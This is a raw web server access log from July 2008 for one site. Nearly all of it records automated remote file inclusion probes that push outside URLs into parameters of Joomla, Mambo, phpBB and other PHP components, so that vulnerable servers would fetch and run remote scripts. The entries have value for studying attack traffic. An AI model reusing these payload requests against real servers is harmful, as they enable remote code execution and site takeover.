202.164.225.11 - - [06/Jul/2008:10:00:16 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:10:00:27 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:00:46 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:00:46 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:00:46 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:10:00:49 -0700] "GET /logs/access.log//index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:00:52 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:00:57 -0700] "GET /logs/access_080207.log/skin/zero_vote/ask_password.php?dir=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:00:58 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:00:58 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:01:03 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:01:03 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:01:03 -0700] "GET /logs///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:01:04 -0700] "GET /logs/access_080315.log/skin/zero_vote/ask_password.php?dir=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:01:04 -0700] "GET ///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.81.65.117 - - [06/Jul/2008:10:01:08 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:10:01:14 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:01:21 -0700] "GET /logs/access.log/index.php?meio=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:01:23 -0700] "GET /index.php?meio=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 200 18401 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:01:23 -0700] "GET /logs/index.php?meio=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.134.97.18 - - [06/Jul/2008:10:01:25 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:01:35 -0700] "GET /logs/access_071224.log/administrator/components/com_color/admin.color.php?mosConfig_live_sitehttp://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:01:35 -0700] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_sitehttp://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:01:36 -0700] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_sitehttp://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:01:39 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:01:39 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:01:40 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:01:40 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:01:44 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:01:45 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:01:47 -0700] "GET ///codebb/lang_select?phpbb_root_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:01:47 -0700] "GET //index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 200 18463 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:01:47 -0700] "GET //index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 200 18447 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:02:01 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/?custompluginfile[]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:02:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/?custompluginfile[]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:02:01 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/?custompluginfile[]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:02:03 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:02:03 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:02:04 -0700] "GET //main.php?sayfa=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:02:04 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:02:05 -0700] "GET /logs//main.php?sayfa=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:02:05 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:10:02:07 -0700] "GET /logs/access_080118.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:02:07 -0700] "GET /logs/access_080117.log/administrator/components/com_color/admin.color.php?mosConfig_live_sitehttp://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:02:16 -0700] "GET ///codebb/lang_select?phpbb_root_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:02:16 -0700] "GET /logs///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:02:17 -0700] "GET ///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.251.172 - - [06/Jul/2008:10:02:27 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:02:35 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:02:36 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:02:36 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:02:37 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:02:42 -0700] "GET /logs/access_071219.log/components/com_simpleboard/image_upload.php?sbp=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.99 - - [06/Jul/2008:10:02:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.186 - - [06/Jul/2008:10:02:51 -0700] "GET /logs/access.log HTTP/1.0" 200 210792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:02:54 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:10:02:56 -0700] "GET /logs/access_080110.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:10:02:56 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:10:02:56 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:02:58 -0700] "GET //index.php?option=com_custompages&cpage=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 200 18473 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:02:58 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:03:03 -0700] "GET /logs/include.php?path[docroot]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:03:03 -0700] "GET /include.php?path[docroot]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:10:03:04 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:03:07 -0700] "GET /logs///codebb/lang_select?phpbb_root_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:03:07 -0700] "GET ///codebb/lang_select?phpbb_root_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:10:03:25 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:10:03:25 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 200 50 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:03:26 -0700] "GET /logs/access.log/includes/ktedit/toolbar.php?dirDepth=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:03:26 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:03:26 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:10:03:31 -0700] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.112.158 - - [06/Jul/2008:10:04:12 -0700] "GET /main.php?page=http://perevorot.org/cache/tits.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [06/Jul/2008:10:04:12 -0700] "GET /logs/access.log/main.php?page=http://perevorot.org/cache/tits.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [06/Jul/2008:10:04:12 -0700] "GET /logs/main.php?page=http://perevorot.org/cache/tits.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:10:04:27 -0700] "GET /logs/access_080225.log/index2.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:10:04:28 -0700] "GET /logs/index2.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:04:32 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
59.126.46.141 - - [06/Jul/2008:10:04:35 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
59.126.46.141 - - [06/Jul/2008:10:04:35 -0700] "GET //index.php?option=com_custompages&cpage=http://monmild.sitesled.com/test.txt? HTTP/1.1" 200 18447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:04:43 -0700] "GET /logs/home.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:04:44 -0700] "GET /logs/home.php?inc=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:04:44 -0700] "GET /home.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:04:44 -0700] "GET /home.php?inc=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:04:50 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:04:52 -0700] "GET /logs/access_080108.log/mvcw.php?step=1&vwar_root=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:04:52 -0700] "GET /mvcw.php?step=1&vwar_root=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:04:52 -0700] "GET /logs/mvcw.php?step=1&vwar_root=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:04:54 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:04:55 -0700] "GET /index.php?meio=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 200 18417 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:04:56 -0700] "GET /logs/access_071230.log/mvcw.php?step=1&vwar_root=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:10:04:59 -0700] "GET ///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:10:05:05 -0700] "GET ///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:05:11 -0700] "GET /logs///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:05:11 -0700] "GET ///com_cropimage/admin.cropcanvas.php?cropimagedir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:10:05:16 -0700] "GET /errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:10:05:16 -0700] "GET /logs/errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:10:05:20 -0700] "GET /logs/access_080507.log/home.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:10:05:21 -0700] "GET /logs/home.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:05:33 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:05:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:05:36 -0700] "GET /logs/include/logout.php?PSA_PATH=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:05:36 -0700] "GET /include/logout.php?PSA_PATH=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:05:37 -0700] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:05:37 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:05:37 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:05:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:05:37 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:05:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:05:41 -0700] "GET //index.php?option=com_custompages&cpage=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 200 18457 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:05:44 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:05:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:05:54 -0700] "GET /logs/index.php?meio=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:05:55 -0700] "GET /index.php?meio=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 200 18417 "-" "libwww-perl/5.65" "www.dmulk.com"
200.49.145.16 - - [06/Jul/2008:10:06:07 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [06/Jul/2008:10:06:08 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:06:11 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
